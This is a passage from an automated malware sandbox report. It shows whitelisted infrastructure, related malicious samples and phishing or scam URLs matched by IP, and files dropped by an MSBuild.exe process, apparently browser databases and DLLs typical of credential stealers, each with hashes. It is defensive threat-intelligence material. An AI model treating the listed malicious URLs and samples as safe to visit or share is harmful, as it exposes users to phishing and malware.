                        • Number of executed functions: 118
                        • Number of non-executed functions: 180
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.85.23.86, 93.184.221.240, 52.165.164.15, 192.229.221.95, 13.95.31.18, 40.126.32.133, 40.126.32.68, 40.126.32.140, 20.190.160.20, 40.126.32.74, 40.126.32.136, 40.126.32.72, 40.126.32.138, 20.189.173.22
                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        Time | Type | Description
                        21:17:58 | API Interceptor | 1x Sleep call for process: MSBuild.exe modified
                        21:18:55 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                              • 77.91.101.71
                                              fp2e7a.wpc.phicdn.net7Y18r(190).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              7Y18r(192).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              7Y18r(205).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              7Y18r(218).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              Endermanch@LPS2019.exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              wEcynzTTVF.exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              https://metamaskwalletexetention.webflow.io/Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              http://56edthdxfhbx.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                              • 192.229.221.95
                                              http://telstra-107436.weeblysite.com/Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AKAMAI-ASUSMy Info Tech Partner Executed Agreement Docs#071999(Revised).pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 23.38.98.104
                                              file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                              • 2.19.126.145
                                              fu[1].exeGet hashmaliciousBdaejecBrowse
                                              • 2.19.126.145
                                              http://stone003.stone168.cloudns.org/Get hashmaliciousUnknownBrowse
                                              • 2.19.126.80
                                              http://worker-winter-voice-2d98.mlzfuyun.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 23.44.111.16
                                              http://cloud.15922894802.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 2.19.126.80
                                              LisectAVT_2403002A_208.exeGet hashmaliciousUnknownBrowse
                                              • 2.19.126.202
                                              LisectAVT_2403002A_208.exeGet hashmaliciousUnknownBrowse
                                              • 2.19.126.202
                                              https://forms.office.com/Pages/ResponsePage.aspx?id=4Kydhlha3USXUsGxfRX-jBHWmjJmsZxDrR9zl3guaTNURU9US0pPQldQMFdROEtOVUJYRlJER1pIMi4uGet hashmaliciousUnknownBrowse
                                              • 2.18.121.134
                                              phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousHTMLPhisherBrowse
                                              • 184.28.90.27
                                              HETZNER-ASDEA9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                              • 188.40.141.211
                                              C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                              • 159.69.71.228
                                              be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 188.40.141.211
                                              EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                              • 188.40.141.211
                                              Endermanch@MEMZ.exeGet hashmaliciousBdaejec, KillMBRBrowse
                                              • 116.202.167.133
                                              file.exeGet hashmaliciousSystemBCBrowse
                                              • 135.181.90.229
                                              file.exeGet hashmaliciousSystemBCBrowse
                                              • 159.69.28.147
                                              http://appinforyvjhf6454ms1a.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                              • 195.201.57.90
                                              LisectAVT_2403002A_172.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 144.76.154.59
                                              LisectAVT_2403002A_207.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 144.76.154.59
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              51c64c77e60f3980eea90869b68c58a8LisectAVT_2403002B_159.dllGet hashmaliciousDridex DropperBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_218.exeGet hashmaliciousUnknownBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_218.exeGet hashmaliciousUnknownBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_273.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_273.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 5.75.212.60
                                              c12.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c12.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c16.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c18.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c17.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              37f463bf4616ecd445d4a1937da06e197Y18r(169).exeGet hashmaliciousCryptOneBrowse
                                              • 23.192.247.89
                                              7Y18r(203).exeGet hashmaliciousUpatreBrowse
                                              • 23.192.247.89
                                              TBw6qwEBHZ.exeGet hashmaliciousBlackMoon, Neshta, XRedBrowse
                                              • 23.192.247.89
                                              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                              • 23.192.247.89
                                              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                                              • 23.192.247.89
                                              PgrZ7RuW1I.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 23.192.247.89
                                              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                                              • 23.192.247.89
                                              Endermanch@7ev3n.exeGet hashmalicious7ev3n, Bdaejec, UACMeBrowse
                                              • 23.192.247.89
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.192.247.89
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.192.247.89
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                  Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                    azeyNF3kkf.exeGet hashmaliciousStealc, VidarBrowse
                                                      Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                        file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                          Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                                  C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                      Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                                        azeyNF3kkf.exeGet hashmaliciousStealc, VidarBrowse
                                                                          Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                                            file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                              Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                                                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
Reputation: high, very likely benign file

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false
Reputation: high, very likely benign file

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: ASCII text, with very long lines (1809), with CRLF line terminators
Category: modified
Size (bytes): 9571
Entropy (8bit): 5.536643647658967
Encrypted: false
SSDEEP: 192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5: 5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1: 72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256: 50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512: 57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious: false
Reputation: moderate, very likely benign file
Preview: // Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 5242880
Entropy (8bit): 0.037963276276857943
Encrypted: false
SSDEEP: 192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5: C0FDF21AE11A6D1FA1201D502614B622
SHA1: 11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256: FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512: A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious: false

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.7873599747470391
Encrypted: false
SSDEEP: 96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5: 6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1: 4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256: 0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512: BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious: false

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.1358696453229276
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5: 28591AA4E12D1C4FC761BE7C0A468622
SHA1: BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256: 51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512: 5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious: false
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):126976
                                                                                      Entropy (8bit):0.47147045728725767
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.1788802555381488
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:TMncOlfc0Nvw4sjMAZrdAmAFzuiFUZ24IO8q:IvlfXNvwpjJaFzuiFUY4IO8q
                                                                                      MD5:0C73DD3FEC2011D481678F692ED9DAA9
                                                                                      SHA1:A3B0652CE199FD20FAE5DE42E714572B02371850
                                                                                      SHA-256:2BE80F4190C614C4D4225649EC4A0D2F4A1D63A3A3EB61DCC47B048903BE68DB
                                                                                      SHA-512:45D45871D296DA1ED29CACC66711334430C3495C62449453FC436308FA35447A34B5572E4DAC128141B2C309385EBAEA5989953B7AF0466A7B39CF91E2337169
                                                                                      Malicious:false
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.3.0.3.0.9.0.4.6.4.1.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.3.0.3.0.9.7.1.8.2.9.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.3.a.e.6.f.3.-.a.3.6.f.-.4.0.b.b.-.9.d.2.a.-.3.5.9.e.4.d.f.0.6.a.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.7.3.f.3.e.4.-.f.8.6.d.-.4.7.2.c.-.8.5.a.d.-.8.4.7.e.e.2.1.0.4.6.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.0.-.0.0.0.1.-.0.0.1.4.-.2.9.e.3.-.c.0.a.1.f.9.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Jul 26 01:18:29 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):174092
                                                                                      Entropy (8bit):1.9646624726691797
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:UhIXk4Qlu5ZRAAQOlAhfuo+7gcuj09WEBUKpcQDAGYTyYU/LaJzalnIyGAYbhJx:JXk4F5ZRoOlAhfuotjKUibm1iLa0TOhz
                                                                                      MD5:352BCD450123D14C13B789FF6E0EC27C
                                                                                      SHA1:DE0C0DE45484E09E6F93D9903979D7D51547F8D8
                                                                                      SHA-256:CBF28071D3BB696BE1AB5FAA0CD9E80E45C0D0483408CD05F50FE495B79B934F
                                                                                      SHA-512:E54FD6399A3EB2D9D0554417BD6F4C61FF6276CBE0C2126AD77260D1F55DB8249C4C8C7B2F6058DD665DBAB94FBD3416B76F8D084F7E9F1A4D89DDB9FF4C2595
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6320
                                                                                      Entropy (8bit):3.71879911668173
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJ5f6KSY3JwNQuprt89bm1FWsfWim:R6lXJR6KSY3Je2mFfK
                                                                                      MD5:2811834BE69DE85B6DD494C81967D4ED
                                                                                      SHA1:FAA56C5638ED8962EAFF58682B0190BD239EF369
                                                                                      SHA-256:4423B8F9556E9EA4733584C61460D9030357D18ED5D0E9761DC1AC4D03DF7381
                                                                                      SHA-512:0392407842F63C4E650ABC391C7105E3AE89BE261EB4B51E77402D6799F1A033C535A4075485FE31E019E09FE0E9228425C91355346FA33EB0389BDA3A8FD1EB
                                                                                      Malicious:false
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.1.2.<./.P.i.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4642
                                                                                      Entropy (8bit):4.456741537769156
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsYJg77aI9PUWpW8VYRvYm8M4JMDF2+q8+1mLNd:uIjfeI7hN7VpJTvmLNd
                                                                                      MD5:A5DC245F37FA7BD81CAFC70F7E1DC051
                                                                                      SHA1:ED03A7E9A2832B21E3FEB321BA8749599EBA07C1
                                                                                      SHA-256:60A85D26AEA0A74D9F11B083BCEC178ECEB5A7124C84901D83A2CA98EC3613B4
                                                                                      SHA-512:ACE6E5B895E701D36ACA3CF18606E4B64E1B8FE75818257C6148433F181AC8AF83FD34CC3A488CE1C18173EC2B4A4584CD48FD37E2ADDEB5E021094B01C4B8D6
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427221" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):685392
                                                                                      Entropy (8bit):6.872871740790978
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
